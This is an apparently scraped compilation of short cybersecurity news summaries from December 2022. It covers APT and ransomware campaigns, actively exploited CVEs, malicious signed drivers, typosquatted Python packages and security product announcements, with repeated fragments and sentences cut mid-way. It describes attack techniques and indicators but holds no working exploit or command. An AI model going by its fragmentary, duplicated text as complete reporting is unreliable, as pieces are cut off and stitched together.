After the initial reconnaissance, the threat actors also deployed Stowaway, Beacon, and Sparepart backdoors that allowed them to maintain access to the compromised computers, execute commands, transfer files, and steal information, including credentials and keystrokes. "Autosummary:
"Autosummary:
Spearphishing attacks The MirrorFace hacking group (APT10 and Cicada) began sending spear-phishing emails to their targets on June 29, 2022, pretending to be PR agents from the recipient’s political party, asking them to post the attached video files on social media. "Autosummary:
"Autosummary:
"Autosummary:
"On December 14, 2022, the day of the Qatar 2022™ semifinal match between France and Morocco, many FuboTV customers experienced issues accessing their accounts," reads a statement posted to FuboTV"s website. "Autosummary:
"CyberData Pros collaborates with RiskRecon, a Mastercard Company, to provide threat prevention services for clients worldwide. Specializing in data security, compliance, consulting and due diligence, CDP analysts provide solution-oriented awareness and implementation routes to improve and eliminate security risks for clients. RiskRecon is a SaaS platform that analyzes a company’s internet-facing assets for cyber risks. RiskRecon cybersecurity ratings and insights make it easy for a company to understand and act based on the risks found … More
The post CyberData Pros and RiskRecon launch global cybersecurity protection for businesses appeared first on Help Net Security.
"Autosummary:
"IBM found that it takes on average 277 days to discover a security breach and costs businesses an average of $4.35 million per breach. Moreover, the time-to-discovery can blindside companies, and with a recession looming, this is not the time for them to be unprepared. In this Help Net Security video, Balaji Ganesan, CEO at Privacera, talks about how organizations are moving to a zero-trust framework and beyond, meaning they have security frameworks that span … More
The post How companies can avoid costly data breaches appeared first on Help Net Security.
"Autosummary:
"Searchlight Security launched Ransomware Search and Insights, a new strategic enhancement to its Cerberus platform. Ransomware Search and Insights automatically collates data from active ransomware groups to help organizations and law enforcement agencies to investigate, track, and gather intelligence on live ransomware activity. This curated view of ransomware groups means that patterns in tactics, incidents, and victimology can be observed in real-time, helping analysts to bolster their threat intelligence, and gain the upper hand on … More
The post Searchlight Security Ransomware Search and Insights collates dark web data on ransomware groups appeared first on Help Net Security.
"Autosummary:
This curated view of ransomware groups means that patterns in tactics, incidents, and victimology can be observed in real-time, helping analysts to bolster their threat intelligence, and gain the upper hand on ransomware groups. "Autosummary:
CVE-2022-31702 (CVSS score: 9.8) - Command injection vulnerability in vRNI (CVSS score: 9.8) - Command injection vulnerability in vRNI CVE-2022-31703 (CVSS score: 7.5) - Directory traversal vulnerability in vRNI (CVSS score: 7.5) - Directory traversal vulnerability in vRNI CVE-2022-31705 (CVSS score: 5.9/9.3) - "Autosummary:
An application may be able to execute arbitrary code with kernel privileges The latest iOS, iPadOS, and macOS updates also introduce a new security feature called Advanced Data Protection for iCloud that expands end-to-end encryption (E2EE) to iCloud Backup, Notes, Photos, and more. "VMware fixed three flaws in multiple products, including a virtual machine escape issue exploited at the GeekPwn 2022 hacking competition. VMware addressed three vulnerabilities in multiple products, including a virtual machine escape flaw, tracked as CVE-2022-31705, that was exploited at the GeekPwn 2022 hacking competition. A working exploit for the CVE-2022-31705 vulnerability was demonstrated by […]
The post VMware fixed critical VM Escape bug demonstrated at Geekpwn hacking contest appeared first on Security Affairs.
"Autosummary:
Linkedin Whatsapp Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
STONESTOP and POORTRY are said to have been used by UNC3944 in attacks aimed at telecommunication, BPO, MSSP, financial services, cryptocurrency, entertainment, and transportation sectors, SentinelOne said, adding a different threat actor utilized a similar signed driver that resulted in the deployment of Hive ransomware. "Apple rolled out security updates to iOS, iPadOS, macOS, tvOS, and Safari to fix a new actively exploited zero-day (CVE-2022-42856). Apple released security updates to address a new zero-day vulnerability, tracked as CVE-2022-42856, that is actively exploited in attacks against iPhones. The flaw is the tenth actively exploited zero-day vulnerability since the start of the […]
The post Apple fixed the tenth actively exploited zero-day this year appeared first on Security Affairs.
"Autosummary:
"Autosummary:
Threat actors, including script kiddies and people with no hacking experience, increasingly join Ransomware-as-a-Service (RaaS) operations to easily get started extorting victims. The trend toward unique and novel ransomware attacks will continue in 2023—IABs, RaaS groups, and affiliates will increase transactions of initial access, including compromised user credentials that unlock various access tools. "Autosummary:
These package descriptions also urged users to click links to get more info about alleged gift card codes, apps, hack tools, etc. Malicious package description (Checkmarx) In some cases, the threat actors promote fake Steam gift card generators, Play Station Network e-gift card codes, Play Store credits, Instagram followers generators, YouTube subscribers generators, and more. "After releasing the Open Source Vulnerabilities database (OSV.dev) in February, Google has launched the OSV-Scanner, a free command line vulnerability scanner that open source developers can use to check for vulnerabilities in their projects’ dependencies. Finding vulnerabilities in open-source dependencies “OSV.dev allows all the different open source ecosystems and vulnerability databases to publish and consume information in one simple, precise, and machine readable format,” explained Rex Pan, a software engineer with the Google Open Source … More
The post OSV-Scanner: A free vulnerability scanner for open-source software appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Base64-encoded SVG file inside the HTML (Cisco) Unlike raster image types, such as JPG and PNG files, SVGs are XML-based vector images that can include HTML <script> tags, which is a legitimate feature of that file format. "Autosummary:
The attackers used malicious standalone JavaScript files to exploit the CVE-2022-44698 zero-day to bypass Mark-of-the-Web security warnings displayed by Windows to alert users that files originating from the Internet should be treated with caution. "Microsoft released December 2022 Patch Tuesday security updates that fix 52 vulnerabilities across its products. Microsoft December 2022 Patch Tuesday security updates addressed 52 vulnerabilities in Microsoft Windows and Windows Components; Azure; Office and Office Components; SysInternals; Microsoft Edge (Chromium-based); SharePoint Server; and the .NET framework. 12 of these vulnerabilities were submitted through the ZDI program. Six vulnerabilities […]
The post December 2022 Patch Tuesday fixed 2 zero-day flaws appeared first on Security Affairs.
"Autosummary:
"Categories: Exploits and vulnerabilities Categories: News Tags: patch Tuesday Tags: Microsoft Tags: Android Tags: Apple Tags: Mozilla Tags: Google Tags: Sap Tags: Citrix Tags: Fortinet Tags: Cisco Tags: CVE-2022-44698 Tags: MotW Tags: CVE-2022-44710 Tags: race condition Tags: CVE-2022-44670 Tags: CVE-2022-44676 Tags: CVE-2022-41076 Tags: remote powershell The last patch Tuesday of 2022 is here—find out what Microsoft and many others have fixed |
The post Update now! Two zero-days fixed in 2022"s last patch Tuesday appeared first on Malwarebytes Labs.
"Autosummary:
Other vendors As per usual, other vendors also released important updates: Adobe released updates for Adobe Campaign Classic, Adobe Experience Manager, and Adobe Illustrator.Posted: December 14, 2022 by The last patch Tuesday of 2022 is here—find out what Microsoft and many others have fixed In numbers, the patch Tuesday of December 2022 is a relatively light one for Windows users. "Categories: News Categories: Ransomware Tags: Antwerp Tags: Diest Tags: Zwijndrecht Tags: Play Tags: Ragnar Locker Tags: ransomware Play ransomware is claiming credit for a devastating attack on Belgium"s largest city. |
The post Play ransomware attacks city of Antwerp appeared first on Malwarebytes Labs.
"Autosummary:
According to the leak site, 557 GB of information was stolen, including personal information, passports, other IDs, and financial documents. "In this Help Net Security video, John Xereas, Executive Director, Technology Solutions at Raytheon Intelligence & Space, offers his cybersecurity predictions for 2023. Specifically, he talks about the need to look at the non-traditional talent that has the potential to thrive in the cyber field. The security industry needs to expand – in terms of diversifying the hiring pool and schools of thought regarding finding cyber solutions for threats like ransomware and malware.
The post Cybersecurity predictions for 2023: Diversity is key appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
The typosquatted Python packages all impersonate the popular requests library: dequests, fequests, gequests, rdquests, reauests, reduests, reeuests, reqhests, reqkests, requesfs, requesta, requeste, requestw, requfsts, resuests, rewuests, rfquests, rrquests, rwquests, telnservrr, and tequests. "An unauthenticated remote code execution flaw (CVE-2022-27518) is being leveraged by a Chinese state-sponsored group to compromise Citrix Application Delivery Controller (ADC) deployments, the US National Security Agency has warned. “Targeting Citrix ADCs can facilitate illegitimate access to targeted organizations by bypassing normal authentication controls.” About CVE-2022-27518 CVE-2022-27518 stems from the vulnerable devices’ software failing to maintain control over a resource throughout its lifetime (creation, use, and release) and gives remote attackers the opportunity to … More
The post State-sponsored attackers actively exploiting RCE in Citrix devices, patch ASAP! (CVE-2022-27518) appeared first on Help Net Security.
"Autosummary:
"A critical RCE vulnerability (CVE-2022-42475) in Fortinet’s operating system, FortiOS, is being exploited by attackers, reportedly by a ransomware group. “Fortinet is aware of an instance where this vulnerability was exploited in the wild,” the company said in an advisory published on Monday, but offered no specific details about the attack. About CVE-2022-42475 CVE-2022-42475 is a heap-based buffer overflow vulnerability in FortiOS, and “may allow a remote unauthenticated attacker to execute arbitrary code or commands … More
The post Critical FortiOS pre-auth RCE vulnerability exploited by attackers (CVE-2022-42475) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The vulnerability impacts the following versions of Citrix ADC and Citrix Gateway: Citrix ADC and Citrix Gateway 13.0 before 13.0-58.32 Citrix ADC and Citrix Gateway 12.1 before 12.1-65.25 Citrix ADC 12.1-FIPS before 12.1-55.291 Citrix ADC 12.1-NDcPP before 12.1-55.291 The above versions are impacted only if the appliances are configured as a SAML SP (SAML service provider) or SAML IdP (SAML identity provider). "Autosummary:
"Autosummary:
LockBit claims 75GB of stolen files On Monday, the LockBit ransomware gang posted on their leak site that they had breached the Department of Finance of the state of California and stole databases, confidential data, financial documents, and IT documents. "Autosummary:
"Autosummary:
The number of bugs in each vulnerability category is listed below: 19 Elevation of Privilege Vulnerabilities 2 Security Feature Bypass Vulnerabilities 23 Remote Code Execution Vulnerabilities 3 Information Disclosure Vulnerabilities 3 Denial of Service Vulnerabilities 1 Spoofing Vulnerability The above counts do not include twenty-five Microsoft Edge vulnerabilities previously fixed on December 5th. "It’s December 2022 Patch Tuesday, and Microsoft has delivered fixes for 50+ vulnerabilities, including a Windows SmartScreen bypass flaw (CVE-2022-44698) exploited by attackers to deliver a variety of malware. CVE-2022-44698 CVE-2022-44698 affects all Windows OS versions starting from Windows 7 and Windows Server 2008 R2. “The vulnerability has low complexity. It uses the network vector, and requires no privilege escalation. However, it does need user interaction; attackers need to dupe a victim into visiting a … More
The post Microsoft fixes exploited zero-day, revokes certificate used to sign malicious drivers (CVE-2022-44698) appeared first on Help Net Security.
"Autosummary:
“Several distinct malware families, associated with distinct threat actors, have been signed with this process,” Mandiant researchers said, noting that they “identified at least nine unique organization names associated with attestation signed malware.” "Citrix urges customers to update their installs to fix actively exploited zero-day (CVE-2022-27518) in Citrix ADC and Gateway. Citrix urges administrators to apply security updates for a zero-day vulnerability, tracked as CVE-2022-27518, in Citrix ADC and Gateway. The vulnerability is actively exploited by China-linked threat actors to gain access to target networks. “We are aware […]
The post Citrix and NSA urge admins to fix actively exploited zero-day in Citrix ADC and Gateway appeared first on Security Affairs.
"Autosummary:
Linkedin Whatsapp Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "LockBit ransomware gang hacked the California Department of Finance and threatens to leak data stolen from its systems. The LockBit ransomware gang claims to have stolen 76Gb from the California Department of Finance and is threatening to leak the stolen data if the victims will not pay the ransom by December 24. On December 12, […]
The post Lockbit ransomware gang hacked California Department of Finance appeared first on Security Affairs.
"Autosummary:
"Autosummary:
Signing a driver via the Windows Hardware Compatibility Program Source: Mandiant Toolkit used to terminate security software In reports released today, researchers explain how they found a new toolkit consisting of two components named STONESTOP (loader) and POORTRY (kernel-mode driver) being used in "bring your own vulnerable driver" (BYOVD) attacks. "Notably, SentinelLabs observed a separate threat actor also utilizing a similar Microsoft signed driver, which resulted in the deployment of Hive ransomware against a target in the medical industry, indicating a broader use of this technique by various actors with access to similar tooling," explained the SentinelLabs researchers. "We were notified of this activity by SentinelOne, Mandiant, and Sophos on October 19, 2022, and subsequently performed an investigation into this activity. "Categories: News Categories: Ransomware Tags: Silence Tags: TA505 Tags: Clop ransomware Tags: Truebot Tags: Grace Tags: Cobalt Strike Tags: Teleport Tags: FIN11 Researchers have identified two new Truebot botnets that are using new versions of the Truebot downloader Trojan to infiltrate and explore a target"s network. |
The post Silence is golden partner for Truebot and Clop ransomware appeared first on Malwarebytes Labs.
"Autosummary:
The other botnet is almost exclusively composed of Windows servers, directly connected to the internet, and exposes several Windows services such as SMB, RDP, and WinRM.For those purposes, this new version of Truebot collects this information: a screenshot, the computer name, the local network name, and active directory trust relations. Exfiltration Besides the usual suspects designed to act as a backdoor, Cobalt Strike and Grace, the researchers also found a new data exfiltration tool. "Autosummary:
"Vulnerability scanning is a fundamental component of every good cyber security strategy – but it can be challenging to get right. Intruder created a vulnerability management platform to make it simple and save time, so that every business can enjoy the same level of security as banks and governments worldwide but without the complexity. Whether you’re just starting out on your cyber security journey or looking to improve existing security controls, Intruder effortlessly finds cyber … More
The post Product showcase: The Intruder vulnerability management platform appeared first on Help Net Security.
"Autosummary:
To make it easier, Intruder provides an up-to-date view of your attack surface to help you to: Increase visibility : get a clear picture of what’s accessible across your internet-facing infrastructure and easily hunt for services that could expose you to risk : get a clear picture of what’s accessible across your internet-facing infrastructure and easily hunt for services that could expose you to risk Preview web assets : identify any web services that don’t belong on the internet, such as exposed infrastructure or application admin panels : identify any web services that don’t belong on the internet, such as exposed infrastructure or application admin panels Stay on top of changes : use services like Slack to notify your technical team about important changes to your network as soon as they happen : use services like Slack to notify your technical team about important changes to your network as soon as they happen React faster: when zero-days are discovered, we help identify your risk and limit your exposure, even when there is no official vulnerability check available Conclusion Effective cyber security starts with getting the basics right. "Bad news first: Ransomware isn’t going anywhere. The good news? The right intelligence can help organizations dramatically reduce risk surrounding a cyber extortion event. In fact, when organizations are armed with intelligence that’s timely, relevant, and actionable, they can bolster their own cyber defense measures and even prevent a ransomware attack from occurring in the first place. Knowledge is power More good news: We know how ransomware “gangs” work and, for the most part, what … More
The post Preventing a ransomware attack with intelligence: Strategies for CISOs appeared first on Help Net Security.
"Autosummary:
For instance, with vulnerability intelligence that includes exploit availability, attack type, impact, disclosure patterns, and other characteristics, vulnerability management teams predict the likelihood that a vulnerability could be used in a ransomware attack. "Axiomatics has introduced the next evolution of its Orchestrated Authorization strategy. Through new capabilities and enhancements to the authorization solution, Axiomatics now offers the adaptable and scalable implementation of fine-grained access control (FGAC). This enables enterprises to centralize their authorization strategy while decentralizing policy modeling, testing, deployment, and analysis. “With increased adoption of zero trust, policies related to access control and risk can no longer be confined to identity and access management (IAM) or security … More
The post Axiomatics Orchestrated Authorization enhancements centralize authorization strategy appeared first on Help Net Security.
"Autosummary:
“With increased adoption of zero trust, policies related to access control and risk can no longer be confined to identity and access management (IAM) or security teams alone, but require support from the broader enterprise, including both development and the business,” said Mark Cassetta, chief product officer for Axiomatics. "Autosummary:
"Researchers reported an increase in TrueBot infections, attackers have shifted from using malicious emails as their primary delivery method to other techniques. Cisco Talos researchers reported an increase in TrueBot infections, threat actors have shifted from using malicious emails as their primary attack vector to other techniques. Truebot has been active since 2017 and some researchers linked it to […]
The post TrueBot infections were observed in Clop ransomware attacks appeared first on Security Affairs.
"Autosummary:
“The attackers, however, appear to have switched to an unknown TrueBot distribution mechanism starting in November, with the vector succeeding in co-opting over 500 internet-facing Windows servers located in the U.S., Canada, and Brazil into a botnet.” concludes the report that also includes Indicators of Compromise (IoCs). "A high-risk stack overflow vulnerability (CVE-2022-20968) may allow attackers to DoS or possibly even execute code remotely on Cisco 7800 and 8800 Series IP phones, the company has confirmed. Cisco‘s PSIRT is also aware that proof-of-concept exploit code is available for the vulnerability and that the flaw has been publicly discussed, but they are not aware of active attacks exploiting it. About CVE-2022-20968 Cisco IP Phone 7800 and 8800 Series are enterprise-grade devices for video … More
The post Vulnerability with public PoC affects Cisco IP phones, fix unavailable (CVE-2022-20968) appeared first on Help Net Security.
"Autosummary:
The vulnerability can be exploited without prior authentication on the part of the attacker, but the attack must be launched from the same physical or logical network as the target device (e.g., via Bluetooth, Wi-Fi, neighbor discovery protocol, etc.). "Autosummary:
[...]“ Fortinet warned that the following file system artifacts would be present on exploited devices: /data/lib/libips.bak /data/lib/libgif.so /data/lib/libiptcp.so /data/lib/libipudp.so /data/lib/libjepg.so "Categories: News Tags: TikTok Tags: ban TikTok Tags: states that banned TikTok Tags: Indiana bans TikTok Tags: Maryland bans TikTok Tags: Shou Zi Chew Tags: Brendan Carr Tags: ByteDance Tags: Brooke Oberwetter The State of Indiana has filed two lawsuits against TikTok, Inc, the company behind the same name app, and its parent company, ByteDance. |
The post Indiana sues TikTok, describes it as "Chinese Trojan Horse" appeared first on Malwarebytes Labs.
"Autosummary:
" TikTok declined to comment on the lawsuits; however, its spokesperson, Brooke Oberwetter, was quoted by The New York Times saying, "the safety, privacy, and security of our community is our top priority." "Autosummary:
"Researchers spotted a cryptocurrency mining campaign targeting Linux users with Go-based CHAOS malware (Trojan.Linux.CHAOSRAT). In November 2022, Trend Micro researchers discovered a cryptocurrency mining campaign targeting Linux users with Go-based CHAOS malware (Trojan.Linux.CHAOSRAT). The Chaos RAT is based on an open-source project. Like the original project, the malware is able to terminate competing malware, security […]
The post Cryptomining campaign targets Linux systems with Go-based CHAOS Malware appeared first on Security Affairs.
"Autosummary:
The Go-based RAT supports the following functions: Perform reverse shell Download files Upload files Delete files Take screenshots Access file explorer Gather operating system information Restart the PC Shutdown the PC Open a URL “On the surface, the incorporation of a RAT into the infection routine of a cryptocurrency mining malware might seem relatively minor,” the researchers conclude. "Autosummary:
Additional lines added on ESXi file (Juniper Networks) One of those lines launches a Python script saved as "/store/packages/vmtools.py," in a directory that stores VM disk images, logs, and more. "Autosummary:
BleepingComputer has been told that the newly leaked data consists of source code, IT asset management reports, data destruction reports, Windows domain login names and email addresses, and other corporate information. "Autosummary:
"Fortinet fixed an actively exploited FortiOS SSL-VPN flaw that could allow a remote, unauthenticated attacker to execute arbitrary code on devices. Fortinet urges customers to update their installs to address an actively exploited FortiOS SSL-VPN vulnerability, tracked as CVE-2022-42475, that could be exploited by an unauthenticated, remote attacker to execute arbitrary code on devices. The CVE-2022-42475 flaw […]
The post Fortinet urges customers to fix actively exploited FortiOS SSL-VPN bug appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"ESET experts offer their reflections on what the continued blurring of boundaries between different spheres of life means for our human and social experience – and especially our cybersecurity and privacy
The post Cybersecurity Trends 2023: Securing our hybrid lives appeared first on WeLiveSecurity
"Autosummary:
Going about our days without tech is practically unthinkable, and this applies to various aspects of our digitally-driven lives, notably work, education, health, leisure, and social interactions.For many, the cloud is best “embodied” in a range of collaboration, videoconferencing, productivity and networking platforms du jour – think Microsoft Teams, Slack or Zoom. "The Pwn2Own Toronto 2022 is ended, and the participants earned a total of $989,750 for 63 unique zero-day exploits. The Zero Day Initiative’s Pwn2Own Toronto 2022 hacking competition has ended and these are the final numbers for the event: DEVCORE and @orange_8361 won Master of Pwn for Toronto 2022. “And we are finished! All of […]
The post Pwn2Own Toronto 2022 Day 4: $989K awarded for 63 unique zero-days appeared first on Security Affairs.
"Autosummary:
The Zero Day Initiative’s Pwn2Own Toronto 2022 hacking competition has ended and these are the final numbers for the event: $989,750 awarded 63 unique 0-days 66 entries 36 different teams representing 14+ countries The final numbers for #Pwn2Own Toronto 2022: $989,750 awarded 63 unique 0-days 66 entries 36 different teams representing 14+ countries See you at #Pwn2Own Miami in February! "Autosummary:
Silence continued their attacks and in three years between 2016 and 2019 they stole at least $4.2 million from banks in the former Soviet Union, Europe, Latin America, and Asia, Silence/Truebot activity June 2016 - July 2019 source: Group-IB Group-IB researchers describe Silence hackers as highly skilled, being able to reverse engineer malware to modify it for their purpose or adapt at the assembler instructions level an exploit used by nation-state group Fancy Bear. Post-infection activity leading to Clop deployment (Cisco Talos) “During the exploration and lateral movement phases, the attackers browsed key server and desktop file systems, connected to SQL databases, and collected data that was exfiltrated using the Teleport tool to an attacker-controlled server,” Cisco Talos researchers explain. "Autosummary:
Silence continued their attacks and in three years between 2016 and 2019 they stole at least $4.2 million from banks in the former Soviet Union, Europe, Latin America, and Asia, Silence/Truebot activity June 2016 - July 2019 source: Group-IB Group-IB researchers describe Silence hackers as highly skilled, being able to reverse engineer malware to modify it for their purpose or adapt at the assembler instructions level an exploit used by nation-state group Fancy Bear. Post-infection activity leading to Clop deployment (Cisco Talos) “During the exploration and lateral movement phases, the attackers browsed key server and desktop file systems, connected to SQL databases, and collected data that was exfiltrated using the Teleport tool to an attacker-controlled server,” Cisco Talos researchers explain. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @struppigel, @PolarToffee, @Seifreed, @fwosar, @DanielGallagher, @BleepinComputer, @Ionut_Ilascu, @LawrenceAbrams, @jorntvdw, @demonslay335, @billtoulas, @FourOctets, @VK_Intel, @serghei, @malwrhunterteam, @malwareforme, @pcrisk, @Unit42_Intel, @Fortinet, @briankrebs, @morphisec, @smgoreli, and @Phylum_IO.Unlike many other ransomware groups such as LockBit that follow a typical ransomware-as-a-service (RaaS) model, Vice Society’s operations are different in that they’ve been known for using forks of pre-existing ransomware families in their attack chain that are sold on DarkWeb marketplaces. "Autosummary:
As legal and financial sectors are a common target for the threat actor, the researchers further theorized that DeathStalker"s customers and operators could be weaponizing the intrusions to keep tabs on lawsuits, blackmail high-profile individuals, track financial assets, and harvest business intelligence about potential mergers and acquisitions. "The US Department of Health and Human Services (HHS) warns healthcare organizations of Royal ransomware attacks. The human-operated Royal ransomware first appeared on the threat landscape in September 2022, it has demanded ransoms up to millions of dollars. The Health and Human Services (HHS) is aware of attacks against the Healthcare and Public Healthcare (HPH) […]
The post US HHS warns healthcare orgs of Royal Ransomware attacks appeared first on Security Affairs.
"Autosummary:
HC3 added that threat actors continue to use multiple attack vectors associated with this ransomware, including phishing, Remote Desktop Protocol (RDP) compromises and credential abuse, compromises of exploited vulnerabilities, such as VPN servers, and compromises in other known vulnerabilities” HHS notes. "Autosummary:
"OPSWAT announced that its MetaDefender Email Gateway Security solution is now available from the cloud as a service, known as MetaDefender Cloud Email Security. This new offering gives organizations the same advanced email security controls but with the added benefits of reduced costs, scalability, ease of operation and improved efficiency. Cloud email adoption is steadily increasing, with research indicating that a majority of organizations are migrating to cloud-based email solutions instead of on-premises to proactively … More
The post OPSWAT MetaDefender Cloud Email Security protects users against zero-day threats appeared first on Help Net Security.
"Autosummary:
"HackNotice unveils new platform features, a new logo and wordmark, dark mode, personalized dashboards, risk meters, easier-to-understand alerts, more powerful monitoring, continuous phishing with the press of a button, and new, easy-to-create templates for phishing. The new platform also allows employees to be grouped based on departments and/or security habits. HackNotice 4.0 allows companies to craft custom phishing templates to help employees identify potential phishing attacks. The templates can be personalized for each employee, making … More
The post HackNotice 4.0 allows companies to craft custom phishing templates appeared first on Help Net Security.
"Autosummary:
HackNotice unveils new platform features, a new logo and wordmark, dark mode, personalized dashboards, risk meters, easier-to-understand alerts, more powerful monitoring, continuous phishing with the press of a button, and new, easy-to-create templates for phishing. "Rezilion has updated MI-X, its open-source tool developed by Rezilion’s vulnerability research team. Available as a download from the Github repository, MI-X already has more than 100 stars on GitHub since its debut in August 2022. The CLI tool is a free, open-source companion to Rezilion’s enterprise solution for software supply chain security and helps researchers and developers identify if containers and hosts are impacted by a specific vulnerability, thus allowing organizations to target remediation … More
The post Rezilion updates its vulnerability risk determination tool MI-X appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
" Subsequent investigations into the adversary"s operations have uncovered two distinct intrusion sets: Cluster A, which employs BitLocker and DiskCryptor to conduct opportunistic ransomware attacks for financial gain, and Cluster B, which carries out targeted break-ins for intelligence gathering. "Autosummary:
Run malware analysis sandbox 3-month license with the following features: Win 7 32/64bit Unlimited manual submissions (1 parallel) Interactive access Analysis time: 660 sec Max input file size: 100MB HTML reports URL analysis Mitre ATT&CK mapping Process behavior graph Extended IDS rule sets Video record MITM proxy for HTTPS Locale selection Network geolocation Priority in queue Various software presets Custom OpenVPN configuration Monitoring of system processes Zero2Automated has also opened pre-registration for their remastered beginner malware analysis course for those looking to learn how to reverse engineer but wanting something a little more beginner-friendly. "Autosummary:
By 5 December, Rackspace said it had engaged third-party experts to look into the ransomware attack, and declined to confirm whether it had paid, or might be prepared to pay, the ransom to its extortionists. "Autosummary:
The attackers, however, appear to have switched to an unknown TrueBot distribution mechanism starting in November, with the vector succeeding in co-opting over 500 internet-facing Windows servers located in the U.S., Canada, and Brazil into a botnet. "Autosummary:
This legislation includes; Virginia Consumer Data Protection Act (VCDPA), effective January 1st, 2023 California Privacy Rights Act (CPRA), effective January 1st, 2023 Utah Consumer Privacy Act (UCPA), effective December 31st, 2023 Connecticut Data Privacy Act (CDPA), effective July 1st, 2023 Colorado Privacy Act (CPA), effective July 1st, 2023 Australia has already begun tightening its data privacy and cybersecurity laws.Indeed, organizations can stay compliant with the ever-changing privacy regulations and reduce the risk of reputational damage by implementing up-to-date policy protocols, identifying employee training best practices, and instilling a nimble framework for company-wide password changes. "Xenomorph pilfers victims" login credentials for banking, payment, social media, cryptocurrency and other apps with valuable data
The post Xenomorph: What to know about this Android banking trojan appeared first on WeLiveSecurity
"Autosummary:
"Autosummary:
" Rackspace added that customers could easily spot scammers attempting to steal their sensitive information since: Emails from Rackspace will be sent from @rackspace.com emails (although attackers might still use a spoofed email address and redirect their targets to a landing phishing page) Rackspace support will not ask for login credentials or personal information (e.g., social security number, driver"s license) during phone calls Even though the company is yet to reveal if it has any evidence that the attackers have stolen data from its systems during the breach, customers were advised to remain vigilant and monitor their credit reports and banking account statements for suspicious activity. "Autosummary:
However, many XDR platforms, including Cynet 360 AutoXDR, provide automation as a standard offering, meaning it won"t cost the business any extra.Additionally, learning a new system could contribute to analyst burnout, so organizations concerned with retention may be hesitant to implement something new, even if it could reduce burnout over time.Additionally, Cynet 360 AutoXDR includes a managed detection and response (MDR) service for no extra charge, helping businesses fill in security gaps without hiring extra analysts — something that is both expensive and extremely difficult at a time when there are around 770,000 unfilled cybersecurity job openings in the United States alone.Frustrated with the inefficiencies that come with using multiple vendors for cybersecurity, often stemming from a lack of integration of a heterogenous security stack, approximately 75% of organizations are looking to consolidate their cybersecurity technology in 2022 — a 29% increase from 2020. "CommonSpirit Health confirmed that the October security breach resulted in the exposure of the personal data of 623,774 patients. In early October, Common Spirit, one of the largest hospital chains in the US, suffered a ransomware cyberattack that caused severe inconvenience to the facilities and to patients. The security breach led to delayed surgeries, hold-ups […]
The post CommonSpirit confirms data breach impacts 623K patients appeared first on Security Affairs.
"Autosummary:
Linkedin Whatsapp Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "ESET researchers uncover a new wiper and its execution tool, both attributed to the Iran-aligned Agrius APT group
The post Diamond industry under attack – Week in security with Tony Anscombe appeared first on WeLiveSecurity
"Autosummary:
"OpenText has partnered with Allstate Identity Protection (AIP) to offer identity protection services to Webroot customers to further protect consumers from evolving cyber threats by shielding their devices, identities and private information. Webroot protects computers, laptops, tablets, smartphones and other digital devices from threats like malware, ransomware, phishing and more. AIP safeguards personal information and the data people share online. The combined offering provides consumers with exceptional multi-layer protection for their digital life. “Increased online … More
The post OpenText collaborates with Allstate Identity Protection to protect consumers from cyber threats appeared first on Help Net Security.
"Autosummary:
Additional benefits include: Device protection: Real-time anti-phishing, malware, ransomware protection against emerging threats Lightning-fast scans without interruption Proactive alerts with firewall and network connection monitoring Protects account logins and passwords Cleans devices and improves performance Identity protection: Dark web monitoring Credit monitoring (one bureau) "Where IoT-enabled devices connect to wider networks, their potential functionalities are immense, with countless applications across various industries, including production and manufacturing, healthcare, finance, and energy. In this Help Net Security video, Paul Keely, Chief Cloud Officer at Open Systems, talks about how organizations that employ IoT technology have improved their business efficiency. Still, all this data introduces a new challenge – security. While IoT presents organizations with new ways to advance and optimize, the … More
The post How IoT is changing the threat landscape for businesses appeared first on Help Net Security.
"Autosummary:
"Secret Double Octopus (SDO) has unveiled the new phishing-resistant passwordless MFA capabilities for customers with password-centric directory infrastructure. Organizations using SDO’s Octopus Platform can achieve Presidential Executive Order M-22-09’s phishing-resistant MFA mandates and meet stringent cyber insurance criteria with new capabilities available to adopters of the company’s Octopus Authentication Platform. The release comes as attackers have expanded phishing attacks against enterprises, leveraging man-in-the-middle (MiTM) tooling and push fatigue strategies to bypass traditional MFA. Despite this, … More
The post Secret Double Octopus unveils phishing-resistant passwordless MFA capabilities appeared first on Help Net Security.
"Autosummary:
"NowSecure has launched its latest offering, NowSecure Mobile Pen Testing as a Service (PTaaS), to bridge the gap between automated and manual mobile security assessments for continuous security. Designed to provide mobile developers and security teams with a more cost-effective, efficient pen testing solution, NowSecure PTaaS combines periodic expert manual assessments with automated continuous testing to optimize for full coverage at a higher frequency rate. With this combination, the all-in-one portal and service can identify … More
The post NowSecure Mobile PTaaS offers continuous automated compliance testing appeared first on Help Net Security.
"Autosummary:
Built on over 12 years of mobile application security experience and tens of thousands of pen tests performed, the NowSecure Mobile PTaaS cloud-based platform offers a depth of automated continuous and manual assessments, including: Periodic expert pen testing based on specific need and schedule On-demand and continuous security testing integrated into CI/CD & dev toolchain Automatic generation of tickets that include embedded remediation resources Remediation consulting with an expert pen tester Optional industry standard(s) validations and certifications All-in-one SAST, DAST, IAST, APISec, and SBOM Easy to use, dedicated SaaS platform “Mobile apps are critically important to business because they generate revenue and connect with customers. "Cybercriminals are scamming each other out of millions of dollars and use arbitration to settle disputes about the scams, according to Sophos. For this report, Sophos experts investigated two Russian-language cybercrime forums that provide Access-as-a-Service (AaaS) listings, and an English-language cybercrime forum and marketplace specializing in data leaks. All three sites have dedicated arbitration rooms. Despite this resolution process provoking occasional mayhem among the “plaintiffs and defendants,” with some accused criminals either going dark and … More
The post Cybercriminals are scamming each other, tipping off law enforcement appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Agrius, the Iran-aligned group behind the intrusions, has been active since at least December 2020 and leverages known security flaws in internet-facing applications to drop web shells that are, in turn, used to facilitate reconnaissance, lateral movement, and the delivery of final-stage payloads. "Autosummary:
Zombinder service promotional post (ThreatFabric) The campaign drops an Ermac payload for Android, capable of performing keylogging, overlay attacks, stealing emails from Gmail, intercepting 2FA codes, and stealing crypto wallet seed phrases. "Autosummary:
